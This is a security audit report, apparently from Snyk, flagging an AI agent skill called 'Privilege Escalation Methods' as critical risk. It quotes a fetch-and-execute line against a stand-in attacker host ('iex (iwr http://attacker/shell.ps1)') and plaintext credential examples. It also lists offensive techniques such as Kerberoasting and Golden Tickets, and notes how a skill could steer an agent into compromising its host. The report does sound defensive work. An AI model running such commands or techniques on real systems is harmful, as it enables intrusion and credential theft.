Privilege Escalation Methods
Fail
Audited by Snyk on Feb 16, 2026
Risk Level: CRITICAL
Full Analysis
HIGH W007: Insecure credential handling detected in skill instructions.
- Insecure credential handling detected (high risk: 1.00). This skill includes and instructs use of plaintext credentials and secret hashes directly in commands and examples (e.g., user:password, Password123, /rc4:<NTLM_HASH>, net user Administrator Password!@#), meaning an agent would need to accept and emit secret values verbatim — creating a high exfiltration risk.
CRITICAL E005: Suspicious download URL detected in skill instructions.
- Suspicious download URL detected (high risk: 1.00). Yes — one URL is a direct HTTP link to a PowerShell script (http://attacker/shell.ps1) hosted on an untrusted/attacker-controlled domain (plaintext, no TLD shown) which is a high-risk malware distribution vector, while the other (https://facebook.com) is legitimate; the presence of the direct .ps1 from an untrusted host makes this set suspicious.
CRITICAL E006: Malicious code pattern detected in skill scripts.
- Malicious code pattern detected (high risk: 1.00). The content provides explicit, step-by-step offensive techniques (Linux/Windows privilege escalation, credential harvesting, Kerberoasting, Golden Ticket creation, token impersonation, remote code execution, persistence, and data exfiltration) and references powerful post-exploitation tools (Mimikatz, Responder, Rubeus, Impacket, etc.), enabling unauthorized system compromise and credential theft.
MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).
- Potentially malicious external URL detected (high risk: 1.00). The skill contains a scheduled-task example that runs PowerShell to execute a remote script via "iex (iwr http://attacker/shell.ps1)", which fetches and executes remote code at runtime and is relied upon by the task.
MEDIUM W013: Attempt to modify system services in skill instructions.
- Attempt to modify system services in skill instructions detected (high risk: 1.00). The skill explicitly instructs the agent to perform privilege escalation (e.g., setuid binaries, chmod +s, modify cron/system services, create scheduled tasks and new users, load drivers, extract credentials and create persistence), which directly modifies system state and encourages compromising the host.
Audit Metadata